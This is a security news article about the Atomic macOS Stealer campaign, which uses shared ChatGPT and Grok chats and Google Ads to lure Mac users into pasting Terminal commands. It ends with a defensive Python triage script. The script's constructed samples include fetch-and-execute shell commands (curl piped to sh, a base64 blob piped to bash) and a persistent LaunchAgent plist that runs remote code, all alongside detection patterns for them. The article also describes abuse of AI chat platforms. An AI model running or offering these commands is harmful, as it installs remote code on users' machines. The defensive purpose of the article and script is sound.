Mac users are facing a sophisticated new threat as cybercriminals are weaponizing artificial intelligence tools like ChatGPT and Grok, combined with Google Ads, to distribute the Atomic macOS Stealer (AMOS). This evolving social engineering tactic exploits user trust in AI-generated content to trick Mac users into executing malicious commands that compromise their systems.
The campaign specifically targets users searching for common troubleshooting solutions, such as methods to clear disk space on macOS. Attackers are creating shareable AI chat links that offer seemingly legitimate, AI-generated step-by-step instructions hosted on trusted domains. These links are then promoted via paid Google advertising, directing unsuspecting users to execute malicious terminal commands.
Attack Mechanism and Infection Chain
The infection process begins when a Mac user performs a Google search for technical assistance. Sponsored advertisements or highly ranked organic results lead victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance. These AI-generated conversations contain carefully crafted instructions designed to prompt users to open their Terminal application.
Victims are then instructed to paste what seems like a harmless command into the Terminal. This command, however, downloads a malicious script from an external domain controlled by the attackers. The script repeatedly requests the user’s system password, masquerading as a legitimate system operation. Once the correct credentials are provided, the script installs the AMOS infostealer and a persistent backdoor, granting attackers long-term remote access to the compromised machine.
The AMOS stealer is designed to immediately target and harvest sensitive information. This includes browser data from Chrome, Safari, and Firefox, such as saved passwords, cookies, and active login sessions. Furthermore, it specifically targets cryptocurrency wallets, including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable rapid theft of digital assets. Personal files are also targeted for exfiltration.
This attack method is particularly effective due to its ability to bypass traditional security measures by appearing entirely legitimate. The malicious instructions are hosted on official ChatGPT and Grok websites, and the use of paid Google advertising adds an additional layer of credibility. Users naturally trust results appearing on reputable platforms like OpenAI and X.AI domains, making them more susceptible to the social engineering employed.
Organizations and individual Mac users should remain vigilant for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains. Security teams advise users that instructions hosted on trusted AI platforms can themselves be a vehicle for social engineering. Any guidance that asks for Terminal commands to be executed should be independently verified through official support channels before it is followed.
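The two indicators this paragraph names, Terminal commands that pull remote code straight into a shell and a persistent backdoor that keeps relaunching, can be triaged from a user's shell history and their LaunchAgents folder. The script below is an added example written for this article, not code from the article or from any vendor tool. The regular expressions, reason strings, the constructed shell-history lines and the two constructed plists (with the placeholder domain `updates.example.invalid`) are all assumptions of the example; the `~/Library/LaunchAgents` location is where per-user launchd persistence normally lives on macOS.

```python
"""Triage helpers for the indicators described in the article: pasted
Terminal commands that hand a remote download to a shell, and LaunchAgent
plists that keep a dropped payload running. All samples are constructed."""
import plistlib
import re
from pathlib import Path
from typing import List, Tuple

# "curl ... | sh"-style fetch-and-execute: the shape of the pasted command the
# article describes. (Pattern is an assumption of this example.)
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
# A base64-decoded blob piped into an interpreter hides the real URL from a
# quick look at the command.
DECODE_TO_SHELL = re.compile(
    r"\bbase64\b[^|\n]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|osascript|python3?)\b")
# Persistence that launches from temp or hidden home-directory paths rather
# than from an installed app bundle.
SUSPICIOUS_PATH = re.compile(
    r"^(?:/tmp/|/private/tmp/|/var/folders/|/Users/[^/]+/\.)")

REASON_PIPE = "pipes a remote download straight into a shell"
REASON_DECODE = "decodes a hidden blob and executes it"
REASON_FETCH = "fetches and executes remote code at every launch"
REASON_PERSIST = "RunAtLoad and KeepAlive set: relaunches persistently"

# Constructed shell-history sample (one line uses zsh extended format).
SAMPLE_HISTORY = [
    "du -sh ~/Library/Caches",
    "brew cleanup",
    ": 1700000000:0;curl -fsSL https://updates.example.invalid/clean.sh | sh",
    "sudo rm -rf ~/Library/Caches/*",
    "echo 'ZWNobyBoaQ==' | base64 -D | bash",
    "curl -O https://updates.example.invalid/notes.txt",  # plain download, not flagged
]

# Constructed LaunchAgent plists: one fetch-and-execute persistence entry
# and one ordinary helper launched from an app bundle.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://updates.example.invalid/h.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/updater</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


def flag_history(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (command, reason) for history lines matching fetch-and-execute."""
    findings = []
    for line in lines:
        # zsh extended history looks like ": <epoch>:<elapsed>;<command>"
        cmd = line.split(";", 1)[1] if line.startswith(": ") and ";" in line else line
        if PIPE_TO_SHELL.search(cmd):
            findings.append((cmd, REASON_PIPE))
        elif DECODE_TO_SHELL.search(cmd):
            findings.append((cmd, REASON_DECODE))
    return findings


def flag_launch_agent(plist_bytes: bytes) -> List[str]:
    """Return the reasons a launchd plist looks like dropped persistence."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or [data.get("Program", "")]
    reasons = []
    if SUSPICIOUS_PATH.match(str(args[0])):
        reasons.append(f"program launches from a suspicious path: {args[0]}")
    joined = " ".join(str(a) for a in args)
    if PIPE_TO_SHELL.search(joined) or DECODE_TO_SHELL.search(joined):
        reasons.append(REASON_FETCH)
    if data.get("RunAtLoad") and data.get("KeepAlive"):
        reasons.append(REASON_PERSIST)
    return reasons


def scan_launch_agents(home: Path = Path.home()) -> List[Tuple[str, List[str]]]:
    """Walk the user's LaunchAgents folder and return flagged plists."""
    results = []
    for plist in (home / "Library" / "LaunchAgents").glob("*.plist"):
        try:
            reasons = flag_launch_agent(plist.read_bytes())
        except Exception as exc:  # a malformed plist is still worth a look
            reasons = [f"could not parse: {exc}"]
        if reasons:
            results.append((str(plist), reasons))
    return results


if __name__ == "__main__":
    for cmd, why in flag_history(SAMPLE_HISTORY):
        print(f"[history] {why}: {cmd}")
    print("[sample agent]", flag_launch_agent(SAMPLE_PLIST))
    for path, why in scan_launch_agents():
        print(f"[agent] {path}: {'; '.join(why)}")
```

On a real machine, feed `flag_history` the lines of `~/.zsh_history` and let `scan_launch_agents` walk the LaunchAgents folder; a hit is a lead for a human to examine (what the script fetched, when the entry was created), not proof of compromise, since some legitimate installers also use the pipe-to-shell idiom.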